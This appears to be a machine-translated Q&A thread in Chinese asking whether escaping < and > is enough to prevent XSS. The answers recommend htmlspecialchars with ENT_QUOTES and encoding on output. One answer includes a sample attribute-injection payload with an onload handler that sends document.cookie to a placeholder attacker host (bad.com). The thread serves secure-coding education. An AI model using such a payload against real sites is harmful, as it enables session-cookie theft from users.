正在替换:<和>与&lt; 和&gt; 足以防止XSS注射？

我想知道是否吸引这两个标记<并且>足以阻止XSS注射？

如果没有,为什么？什么是最好的解决方案？

1> alex..：

---

这在很大程度上取决于背景.

从典型的论坛网站查看此示例...

您可以将您的头像图像热链接.输入完整的URL.

恶意用户输入输入字段

http://www.example.com/image.png" onload="window.location = 'http://www.bad.com/giveme.php?cookie=' + encodeURI(document.cookie) 

没有小于和大于的编码,但仍然是一个很大的安全漏洞.

有了htmlspecialchars(),我发现制作(或使用)它的一个包装函数是一个好主意,它转换为一个字符串,提供了一种更简单的方法来禁用双重编码(如果需要)并确保它使用你的应用程序的正确字符集.Kohana有一个很好的例子.

---

我不会编码进入数据库,但编码出来.通常,"按原样"存储用户数据通常是个好主意,并提供一些机制使其在显示时安全.

2> BalusC..：

---

您还应该考虑双引号",单引号'和&符号&.如果你在显示/生成输出期间这样做,那么是的,这就足够了.

您应该只确保对任何用户控制的输入执行此操作,例如请求参数,请求URL,请求标头和存储在数据存储区中的用户控制的输入.

在PHP中,您可以使用htmlspecialchars()和使用JSTL在JSP中执行此操作.

---

注意`htmlspecialchars`默认只转义双引号,而不是单引号.但这通常没问题,因为将单引号用作属性定界符是非常罕见的.使用`ENT_QUOTES`确保同时获得两者.